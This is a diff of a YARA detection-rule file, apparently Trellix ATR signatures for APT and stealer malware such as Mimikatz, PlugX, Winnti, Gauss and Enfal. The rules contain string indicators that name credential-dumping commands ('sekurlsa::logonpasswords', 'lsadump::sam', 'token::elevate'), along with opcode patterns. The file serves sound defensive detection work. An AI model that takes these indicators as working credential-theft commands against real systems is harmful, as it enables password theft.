+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L211-L258"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "66f13964c87fc6fe093a9d8cc0de0bf2b3bdaea9564210283fdb97a1dde9893b"
-		logic_hash = "7165779b66999259a079fa68f898c5f9fb634adcb9d249366d321dff1014184b"
+		logic_hash = "4ccb44bf0d490a18e35290d904326ce14cdc92c96be1a38e6059431645233e37"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
+		quality = 68
+		tags = "HACKTOOL, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/RecordedTV"
+		malware_type = "hacktool"
+		malware_family = "Hacktool:W32/Mimikatz"
 		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$byte = { C0 0E 5B C3 }
-		$s1 = "Encrypted file:  CRC failed in %s (password incorrect ?)" fullword wide
-		$s2 = "EBorland C++ - Copyright 1999 Inprise Corporation" fullword ascii
-		$s3 = " MacOS file type:  %c%c%c%c  ; " fullword wide
-		$s4 = "rar.lng" fullword ascii
+		$s1 = "livessp.dll" fullword wide
+		$s2 = "\\system32\\tapi32.dll" fullword wide
+		$s3 = " * Process Token : " fullword wide
+		$s4 = "lsadump" fullword wide
+		$s5 = "-nl - skip lsa dump..." fullword wide
+		$s6 = "lsadump::sam" fullword wide
+		$s7 = "lsadump::lsa" fullword wide
+		$s8 = "* NL$IterCount %u, %u real iter(s)" fullword wide
+		$s9 = "* Iter to def (%d)" fullword wide
+		$s10 = " * Thread Token  : " fullword wide
+		$s11 = " * RootKey  : " fullword wide
+		$s12 = "lsadump::cache" fullword wide
+		$s13 = "sekurlsa::logonpasswords" fullword wide
+		$s14 = "(commandline) # %s" fullword wide
+		$s15 = ">>> %s of '%s' module failed : %08x" fullword wide
+		$s16 = "UndefinedLogonType" fullword wide
+		$s17 = " * Username : %wZ" fullword wide
+		$s18 = "logonPasswords" fullword wide
+		$s19 = "privilege::debug" fullword wide
+		$s20 = "token::elevate" fullword wide
+		$op0 = { e8 0b f5 00 00 90 39 35 30 c7 02 00 75 34 48 8b }
+		$op1 = { eb 34 48 8b 4d cf 48 8d 45 c7 45 33 c9 48 89 44 }
+		$op2 = { 48 3b 0d 34 26 01 00 74 05 e8 a9 31 ff ff 48 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "169e02f00c6fb64587297444b6c41ff4" and all of them )
 }
-rule TRELLIX_ARC_Apt_Auriga_Driver : KERNELDRIVER FILE
+
+rule TRELLIX_ARC_Sfx_Winrar_Plugx : BUILDER FILE
 {
 	meta:
-		description = "Rule to detect the Auriga driver"
+		description = "Rule to detect the SFX WinRAR delivering a possible Plugx sample"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b61058a1-1b48-5be1-ba2f-74a7c3d38825"
-		date = "2013-03-13"
+		id = "ac975a58-6a8a-515e-b27f-327a7bfc7686"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_auriga_biscuit.yar#L1-L39"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L260-L307"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "207eee627a76449ac6d2ca43338d28087c8b184e7b7b50fdc60a11950c8283ec"
-		logic_hash = "c027073ba398fe89d418be67f0850c8d9e4d4c50a991c45b84cdb416497ccf1c"
+		logic_hash = "8231f46330762cecf8a796d1a29c8fa6ba1c10b527fa86bf6c73130349558dad"
 		score = 75
-		quality = 70
-		tags = "KERNELDRIVER, FILE"
+		quality = 68
+		tags = "BUILDER, FILE"
 		rule_version = "v1"
-		malware_type = "kerneldriver"
-		malware_family = "Driver:W32/Auriga"
-		actor_type = "APT"
-		actor_group = "APT1"
+		malware_type = "builder"
+		malware_family = "Builder:W32/Plugx"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = "\\SystemRoot\\System32\\netui.dll" fullword wide
-		$s2 = "\\SystemRoot\\System32\\drivers\\riodrv32.sys" fullword wide
-		$s3 = "\\SystemRoot\\System32\\arp.exe" fullword wide
-		$s4 = "netui.dll" fullword ascii
-		$s5 = "riodrv32.sys" fullword wide
-		$s6 = "\\netui.dll" fullword wide
-		$s7 = "d:\\drizt\\projects\\auriga\\branches\\stone_~1\\server\\exe\\i386\\riodrv32.pdb" fullword ascii
-		$s8 = "\\riodrv32.sys" fullword wide
-		$s9 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\riodrv32" fullword wide
-		$s10 = "\\DosDevices\\rio32drv" fullword wide
-		$s11 = "e\\Driver\\nsiproxy" fullword wide
-		$s12 = "(C) S3/Diamond Multimedia Systems. All rights reserved." fullword wide
-		$s13 = "\\Device\\rio32drv" fullword wide
-		$s14 = "\\Registry\\Machine\\SOFTWARE\\riodrv" fullword wide
-		$s15 = "\\Registry\\Machine\\SOFTWARE\\riodrv32" fullword wide
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "Wrong password for %s5Write error in the file %s. Probably the disk is full" fullword wide
+		$s3 = "mcutil.dll" fullword ascii
+		$s4 = "Unexpected end of archiveThe file \"%s\" header is corrupt%The archive comment header is corrupt" fullword wide
+		$s5 = "mcoemcpy.exe" fullword ascii
+		$s6 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+		$s7 = "&Enter password for the encrypted file:" fullword wide
+		$s8 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
+		$s9 = "setup.bat" fullword ascii
+		$s10 = "ErroraErrors encountered while performing the operation" fullword wide
+		$s11 = "Please download a fresh copy and retry the installation" fullword wide
+		$s12 = "antivir.dat" fullword ascii
+		$s13 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
+		$s14 = "=Total path and file name length must not exceed %d characters" fullword wide
+		$s15 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
+		$s16 = "folder is not accessiblelSome files could not be created." fullword wide
+		$s17 = "Packed data CRC failed in %s" fullword wide
+		$s18 = "DDTTDTTDTTDTTDTTDTTDTTDTTDTQ" fullword ascii
+		$s19 = "File close error" fullword wide
+		$s20 = "CRC failed in %s" fullword wide
+		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
+		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
+		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
 }
-rule TRELLIX_ARC_Apt_Manitsme_Trojan : TROJAN FILE
+rule TRELLIX_ARC_Apt_Gauss_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Manitsme trojan"
+		description = "Rule to detect Gauss based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "49e0c934-6920-5e49-837c-27ebbbd5a1a2"
-		date = "2013-03-08"
+		id = "209223cc-16e5-5596-8744-21ad71b5ec2a"
+		date = "2012-08-14"
 		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_manitsme_trojan_pdb.yar#L1-L36"
+		reference = "https://securelist.com/the-mystery-of-the-encrypted-gauss-payload-5/33561/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/gauss_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c1c0ea096ec4d36c1312171de2a9ebe258c588528a20dbb06a7e3cf97bf1e197"
-		logic_hash = "584053145249a930d3eae5e291d3553c57fa427dbecac9f04e7c0169f153b7af"
+		hash = "7b0d0612b4ecc889a901115c2e77776ef0ea65c056b283d12e80f863062cea28"
+		logic_hash = "cb20c87ea976f395e000f2c631ffd52b09dca2af37adceafe5be72b37f75a997"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Manitsme"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Gauss"
 		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "SvcMain.dll" fullword ascii
-		$s2 = "rj.soft.misecure.com" fullword ascii
-		$s3 = "d:\\rouji\\SvcMain.pdb" fullword ascii
-		$s4 = "constructor or from DllMain." fullword ascii
-		$s5 = "Open File Error" fullword ascii
-		$s6 = "nRet == SOCKET_ERROR" fullword ascii
-		$s7 = "Oh,shit" fullword ascii
-		$s8 = "Paraing" fullword ascii
-		$s9 = "Hallelujah" fullword ascii
-		$s10 = "ComSpec" fullword ascii
-		$s11 = "ServiceMain" fullword ascii
-		$s12 = "SendTo(s,(char *)&sztop,sizeof(sztop),FILETYPE) == ERRTYPE" fullword ascii
+		$pdb = "\\projects\\gauss\\bin\\release\\winshell.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and any of them
 }
-rule TRELLIX_ARC_Enfal_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Blackenergy_Pdb : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect Enfal malware"
+		description = "Rule to detect the BlackEnergy trojan"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "09b9667c-cf58-5438-958d-19a99fe91e32"
-		date = "2013-08-27"
+		id = "55c96b66-a8bf-5390-a75a-f3d2441c2a55"
+		date = "2013-02-15"
 		modified = "2020-08-14"
-		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/enfal"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/enfal_pdb.yar#L1-L29"
+		reference = "https://www.kaspersky.com.au/resource-center/threats/blackenergy"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_blackenergy_pdb.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "6756808313359cbd7c50cd779f809bc9e2d83c08da90dbd80f5157936673d0bf"
-		logic_hash = "1f7785a4c54981c3e7cb417718312e0ed82132b9bd9288f7b0f322cbeafbaecd"
+		hash = "4b2efcda5269f4b80dc417a2b01332185f2fafabd8ba7114fa0306baaab5a72d"
+		logic_hash = "7bb85d03d8f2a4d91554f7fea96e9bbe36b153cfa4a91fd13fb99d41d430c9e9"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Enfal"
-		actor_type = "Apt"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/BlackEngergy"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\DllServiceTrojan.pdb"
-		$pdb1 = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\ServiceDll.pdb"
-		$pdb2 = "\\Release\\ServiceDll.pdb"
-		$pdb3 = "\\muma\\0511\\Release\\ServiceDll.pdb"
-		$pdb4 = "\\programs\\LuridDownLoader\\LuridDownloader for Falcon\\ServiceDll\\Release\\ServiceDll.pdb"
+		$s1 = "msiexec.exe /i \"%s\" %s REBOOT=\"ReallySuppress\"" fullword wide
+		$s2 = "InstallUpdate: CreateProcess failed, Cmdline=%s Error=%d ." fullword wide
+		$s3 = "Portuguese=Instalando o Tempo de Execu" fullword wide
+		$s4 = "Initialization: Failed to initialize - Unable to get Upgrade Code." fullword wide
+		$s5 = "This version of Internet Explorer is not supported.  You should upgrade Internet Explorer to version %s and run setup again.  Se" wide
+		$s6 = "Initialization: Failed to open %s file, Make sure the file is not used by another process." fullword wide
+		$s7 = "o %s e execute a configura" fullword wide
+		$s8 = "Initialization: Failed to initialize - Unable to get Product Version." fullword wide
+		$s9 = "f:\\CB\\11X_Security\\Acrobat\\Installers\\BootStrapExe_Small\\Release\\Setup.pdb" fullword ascii
+		$s10 = "BootStrap.log" fullword wide
+		$s11 = "ACDownloaderDlg" fullword ascii
+		$s12 = "Initialization: Failed to initialize Product - msi key not specified." fullword wide
+		$s13 = "rio atualizar para o Service Pack %s e executar a instala" fullword wide
+		$s14 = "\\Msi.dll" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule TRELLIX_ARC_Apt_Gdocupload_Glooxmail : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Elise_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect gdocupload tool used by APT1"
+		description = "Rule to detect Elise APT based on the PDB reference"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "deb20196-65e6-5dac-af0c-2f16e5926715"
-		date = "2013-02-19"
+		id = "cc8dd203-baad-5800-ba2c-f9c47d8ca6f0"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_gdocupload_pdb.yar#L1-L32"
+		reference = "https://attack.mitre.org/software/S0081/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_elise_pdb.yar#L1-L29"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "295c5c7aa5fa29628dec9f42ed657fce0bc789079c4e51932bcbc99a28dfd440"
-		logic_hash = "e016bb636af22fae79875bebaf1b4bd4f2a403e797d7ee52ea0691b4d7a54cf8"
+		hash = "b426dbe0f281fe44495c47b35c0fb61b28558b5c8d9418876e22ec3de4df9e7b"
+		logic_hash = "bb7eee8082aa0f6634a8c4cdb9cbe0e2a7f00b97e48609c81a21bdaac64a5496"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Gdocupload"
+		malware_family = "Backdoor:W32/Elise"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "https://www.google.com/accounts/ServiceLogin?service=writely&passive=1209600&continue=http://docs.google.com/&followup=http://do" ascii
-		$s2 = "Referer: http://sn114w.snt114.mail.live.com/mail/AttachmentUploader.aspx?_ec=1" fullword ascii
-		$s3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET " ascii
-		$s4 = "e:\\Project\\mm\\Webmail\\Bin\\gdocs.pdb" fullword ascii
-		$s5 = "http://docs.google.com/?auth=" fullword ascii
-		$s6 = "x-guploader-client-info: mechanism=scotty flash; clientVersion=18067216" fullword ascii
-		$s7 = "http://docs.google.com/" fullword ascii
-		$s8 = "Referer: http://sn114w.snt114.mail.live.com/mail/EditMessageLight.aspx?n=%s" fullword ascii
+		$pdb = "\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb"
+		$pdb1 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\SetElise.pdb"
+		$pdb2 = "\\lstudio\\projects\\lotus\\elise\\Release\\SetElise\\i386\\SetElise.pdb"
+		$pdb3 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\Uninstaller.pdb"
+		$pdb4 = "\\lstudio\\projects\\lotus\\evora\\Release\\EvoraDLL\\i386\\EvoraDLL.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
 }
-rule TRELLIX_ARC_Apt_Lagulon_Trojan_Pdb : TROJAN FILE
+rule TRELLIX_ARC_APT_Winnti : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect trojan Lagulon based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "a31a465d-1f16-5c3e-a62d-ea15c11253c3"
-		date = "2013-08-31"
-		modified = "2020-08-14"
-		reference = "https://www.cylance.com/operation-cleaver-cylance"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_lagulon_pdb.yar#L1-L25"
+		description = "Detects Winnti variants"
+		author = "McAfee ATR Team"
+		id = "f12b039a-2508-580f-b777-428bbda2c666"
+		date = "2020-06-04"
+		modified = "2020-10-14"
+		reference = "https://attack.mitre.org/software/S0141/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_winnti.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53"
-		logic_hash = "dad04c2deb990f253f952b768b74349dc9afb5f6db91ea3afff889f4c9f3230b"
+		hash = "fd539d345821d9ac9b885811b1f642aa1817ba8501d47bc1de575f5bef2fbf9e"
+		logic_hash = "f94b2c552fbb30e1005e5c75a2f449d60b9558a0916197bed41bf32c6477daef"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/lagulon"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Winnti"
 		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\proj\\wndTest\\Release\\wndTest.pdb"
+		$pattern = { 9090909090909090909090909090C7????????????C2????90909090909081??????????E9????????CCCCCCCCCC8A??????8B??????538A??8A??568B??578B??????8B??C1????66????8B??C1????F3AB8B??83????F3AA8B??5F5E5BC390909090909090909090909090909083????5333??568D??????535089??????89??????E8????????8A??33??3A??8D??????0F94??83????5389??????528B??89??????C6????????E8????????8B??33??81??????????8D??????0F94??6A??89??????5223??89??????C6????????C6????????E8????????33??66????8D??????6A??0F94??89??????89??????5223??C6????????C6????????E8????????8B??83????33??3B??0F94??23??5E495BF7??1B??8B??83????C38B??????8B??????03??C390909090908B??????85??0F84????????8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??E9????????83????C39090909090909090909090909083????8B??????53558B??????33??568B??????83????5789??????76??81??????????8B??76??BF????????8B??????8D????03??C1????03??89??????3B??76??8B??????68????????6A??52E8????????8B??????8B??????8B??????505351565752E8????????8B??????8B??8B??????2B??8B??83????03??8B??????83????89??????77??03??0F84????????8B??????8B??????2B??03??3B??89??????75??81??????????77??8A??04??EB??83????77??08????EB??83????77??8A??80????88??EB??8D????C6????463D????????89??????76??8D????B8????????F7??C1????8B??33??8B??8B??C1????F3AB8B??83????03??F3AA8B??????81??????????4A89??????75??8B??????8B??88??468A??88??46424B75??8B??????C6????465FC6????46C6????2B??8B??????4633??89??5E5D5B83????C390909090909090909083????8B??????53558B??????568B??????8D????5789??????8B??????83????73??B8????????2B??EB??33??03??8B??2B??C1????8D??????89??????8B??????8B??????8D????3B??0F83????????8B??8B??69??????????8B??????8B??????C1????33??66??????03??8B??????2B??????89??????66??????8B??3B??0F85????????8B??????C7??????????????2B??8B??????8B??2B??0F84????????83????77??8A????0A??88????8B????89??03??E9????????83????77??8A??2C??88??468B????89??8B????89????8B????89????8B????89????03??E9????????83????77??8A??80????88??46EB??8D????C6????463D????????89??????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??8B??????81??????????4889??????75??8B??????8B??8B??????88??468B????89??8B????89????8B????89????8B????89????83????83????83????83????73??85??76??8A????88??46454B75??BB????????8B????8B????33??75??BB????????03??8B????8B??33??8B??????83????3B??73??8B??2B??????85??75??83????83????8B????8B??33??8B??????3B??72??EB??84??75??C1????4384??74??8B??????8B??03??2B??83????89??????77??3D????????77??4880????8A??80????C0????C0????0A??88??46C1????88??46E9????????3D????????77??4883????89??????77??80????80????EB??83????C6????4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????2D????????83????89??????77??8B??80????C1????80????8A??0A??80????88??46C0????88??46C1????88??46E9????????8B??83????C1????80????80????88??4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????8B??????E9????????8B??????8B??????8B??????2B??89??8B??5F2B??5E5D03??5B83????C390909090909090909090908B??????538B??????55568B??????C7??????????578A??8D????8B??????80????8B??76??81??????????8D????83????8B??83????0F82????????8A??88??40414F75??EB??33??8A??418B??83????0F83????????85??75??80????75??8A????81??????????4184??74??33??8A??418D??????8B??89??83????83????4E74??83????72??8B??89??83????83????83????83????73??85??76??8A??88??40414E75??EB??8A??88??40414E75??33??8A??418B??83????73??33??8B??8A??C1????2B??C1????2B??8A??????????81??????????4188??40478A??88??8A????4088??408A????83????8B??0F84????????8A??88??404183????76??8A??88??404183????76??8A??88??404133??8A??418B??83????72??8B??8B??C1????83????2B??33??8A??C1????2B??4F41C1????4E8A??88??8A????404788??40478A??88??40474E75??EB??83????72??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????8D????66????81??????????C1????2B??83????EB??83????0F82????????8B??8B??83????C1????2B??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????66????81??????????C1????2B??83????3B??74??81??????????83????0F82????????8B??2B??83????0F8C????????8B??89??83????83????83????8B??89??83????83????83????83????73??85??0F86????????8A??88??40474E75??E9????????33??8B??8A??C1????2B??C1????2B??4F41E9????????8B??????2B??3B??89??75??5F5E5D33??5BC31B??5F24??5E5D83????5BC39090909090909090909090909081??????????568B??68????????C7??????????FF??????????83????75??57B9????????33??8D??????66????????????F3AB66AB8D??????5068????????FF??????????83????5F75??6A??68????????FF??????????8B??5E81??????????C390909090909090909090909090568B??E8????????F6????????74??56E8????????83????8B??5EC2????909068????????C7??????????FF??????????85??75??FF??????????C39090909053558B??????5685??5774??8B??????85??74??33??33??33??85??76??8A??????????8A??????????32??80????32??8A????32??33??88????8D????BE????????F7??8D????BF????????8B??33??F7??413B??8B??72??5F5E5D5BC39083????538B??????55565768????????68????????5333??FF??????????8B??85??0F84????????68????????FF??????????8B??B0??88??????88??????8D??????B1??5056C6????????88??????C6????????C6????????C6????????C6????????88??????C6????????C6????????C6????????C6????????FF??????????5753FF??568B??FF??????????85??74??57FF??????????8B??8B??????B9????????8B??68????????50F3A5E8????????83????B8????????5F5E5D5B83????C35F8B??5E5D5B83????C39090538B??????????5657C7??????????8D????BF???????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
 rule TRELLIX_ARC_Apt_Hanover_Pdb : BACKDOOR FILE
 {
@@ -146096,549 +146338,470 @@ rule TRELLIX_ARC_Apt_Hanover_Slidewin_Pdb : BACKDOOR FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
 }
-rule TRELLIX_ARC_STEALER_Credstealesy : STEALER
+rule TRELLIX_ARC_Enfal_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Generic Rule to detect the CredStealer Malware"
-		author = "IsecG – McAfee Labs"
-		id = "90e23ed8-3243-519b-8eb4-9db5902c73d3"
-		date = "2015-05-08"
+		description = "Rule to detect Enfal malware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "09b9667c-cf58-5438-958d-19a99fe91e32"
+		date = "2013-08-27"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/when-hackers-get-hacked-the-malware-servers-of-a-data-stealing-campaign/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_credstealer.yar#L1-L24"
+		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/enfal"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/enfal_pdb.yar#L1-L29"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "3d007fc0d2e2eb3d8f0c2b86dd01ede482e72f6c67fd6d284d77c47b53021b3c"
+		hash = "6756808313359cbd7c50cd779f809bc9e2d83c08da90dbd80f5157936673d0bf"
+		logic_hash = "1f7785a4c54981c3e7cb417718312e0ed82132b9bd9288f7b0f322cbeafbaecd"
 		score = 75
 		quality = 70
-		tags = "STEALER"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Stealer:W32/CredStealer"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Enfal"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide
-		$my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8}
+		$pdb = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\DllServiceTrojan.pdb"
+		$pdb1 = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\ServiceDll.pdb"
+		$pdb2 = "\\Release\\ServiceDll.pdb"
+		$pdb3 = "\\muma\\0511\\Release\\ServiceDll.pdb"
+		$pdb4 = "\\programs\\LuridDownLoader\\LuridDownloader for Falcon\\ServiceDll\\Release\\ServiceDll.pdb"
 
 	condition:
-		$my_hex_string and $my_hex_string2
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-rule TRELLIX_ARC_STEALER_Lokibot : STEALER FILE
+rule TRELLIX_ARC_Chimera_Recordedtv_Modified : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect Lokibot stealer"
+		description = "Rule to detect the modified version of RecordedTV.ms found in the Operation Skeleton"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "75f502a3-2d9f-5ccf-93f8-2d6a73e9e1b7"
-		date = "2020-09-23"
-		modified = "2020-09-25"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_Lokibot.yar#L1-L39"
+		id = "b0969713-41a4-550c-9545-f02783fa8d02"
+		date = "2020-04-21"
+		modified = "2020-08-14"
+		reference = "https://medium.com/@cycraft_corp/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_skeleton.yar#L1-L33"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "999a69394a545f726cf15e4361e0dfc17eeac6544e6816a0ad140316e9642510"
+		hash = "66f13964c87fc6fe093a9d8cc0de0bf2b3bdaea9564210283fdb97a1dde9893b"
+		logic_hash = "7165779b66999259a079fa68f898c5f9fb634adcb9d249366d321dff1014184b"
 		score = 75
 		quality = 70
-		tags = "STEALER, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Ransomware:W32/Lokibot"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/RecordedTV"
+		actor_type = "Apt"
 		actor_group = "Unknown"
-		hash1 = "0e40f4fdd77e1f90279c585cfc787942b8474e5216ff4d324d952ef6b74f25d2"
-		hash2 = "3ad36afad12d8cf245904285c21a8db43f9ed9c82304fdc2f27c4dd1438e4a1d"
